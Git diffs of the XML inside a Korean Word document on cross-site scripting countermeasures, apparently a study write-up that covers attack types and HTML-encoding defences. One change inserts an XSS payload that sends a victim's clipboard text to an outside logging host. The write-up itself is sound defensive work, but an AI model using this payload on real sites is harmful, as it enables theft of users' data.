+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>피싱</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트로 이동</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">미리 구성한 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>피싱</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML 태그를 이용한 스크립트 실행</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>DDoS 공격</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>결론</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS 취약점은 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>크로스</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 대응방안</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>개요</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>웹</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 페이지에 악의적인 스크립트를 포함시켜 불특정 다수의 사용자들에게서 동작 시키는 공격인 크로스 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>스크립팅은</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>네이버의</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 필터를 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>참고</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">하여 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">상세한 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>대응방안을 자세히 알아보고자 한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>보안대책</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>외부입력</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 값에 삽입된 스크립트 구문 작성 시 사용되는 특수문자를 HTML </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>인코딩</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 문자로 치환하여 스크립트 구문의 동작을 막는다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>별도의 제약사항 없이 모든 태그 무력화</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>코드</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 예제</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1206"/>
+        <w:gridCol w:w="9476"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -2994,7 +3298,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1384" w:type="dxa"/>
+            <w:tcW w:w="1206" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -3022,7 +3326,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="9298" w:type="dxa"/>
+            <w:tcW w:w="9476" w:type="dxa"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3039,7 +3343,7 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5D4B3C" wp14:editId="081BF5AC">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32339086" wp14:editId="7F3C2B1C">
                   <wp:extent cx="4107396" cy="726141"/>
                   <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                   <wp:docPr id="1" name="그림 1"/>
@@ -3054,7 +3358,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId7"/>
+                          <a:blip r:embed="rId8"/>
                           <a:srcRect b="10989"/>
                           <a:stretch/>
                         </pic:blipFill>
@@ -3535,6 +3839,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2">
+    <w:nsid w:val="651C3419"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="15F6C14E"/>
+    <w:lvl w:ilvl="0" w:tplc="3F88CD4A">
+      <w:start w:val="5"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cstheme="minorBidi" w:hint="eastAsia"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1600" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2000" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2800" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3200" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4000" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4400" w:hanging="400"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="7B7804BA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82B49E82"/>
@@ -3623,7 +4040,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="7E654D84"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3244C236"/>
@@ -3740,12 +4157,15 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5">
     <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
@@ -4783,7 +5203,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E2363985-D500-4E76-B646-0DA37B8ABD48}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{68E97451-0956-43A0-B5AF-D7CC80FF0B68}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -475,7 +475,16 @@
                 <w:b/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>실행결과</w:t>
+              <w:t>실행결</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>과</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -541,35 +550,16 @@
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
+      </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="a3"/>
@@ -593,15 +583,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>alert(</w:t>
+              <w:t>new Image().</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
+              <w:t>src</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> = 'http://springs-thursday.iptime.org/st-apps/logging/loggin.php?c=' + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:t>window.clipboardData.getData</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
-              <w:t>('Text'));</w:t>
+              <w:t>('Text');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5203,7 +5201,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{68E97451-0956-43A0-B5AF-D7CC80FF0B68}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{163F1C2F-8EEE-49A9-9699-A6BC584ED315}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -77,11 +77,19 @@
       <w:r>
         <w:t>”</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>를 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -103,11 +111,33 @@
       <w:r>
         <w:t>”</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 통한 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>인증정보</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -181,59 +211,23 @@
         <w:t>(Keylogging)이라 한다. 다음은 짧은 스크립트 코드를 삽입하여 사용자의 입력 값을 가로채는 공격의 예시이다.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>클립보드 값 탈취</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>키로깅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
-      </w:r>
-    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>클립보드 복사</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 페이지</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>로그인 페이지</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -255,203 +249,10 @@
           <w:p>
             <w:pPr>
               <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;!DOCTYPE html&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;head&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;meta http-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>equiv</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>="Content-Type" content="text/html; charset=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>euc-kr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>" /&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;title&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>중요테이터를</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
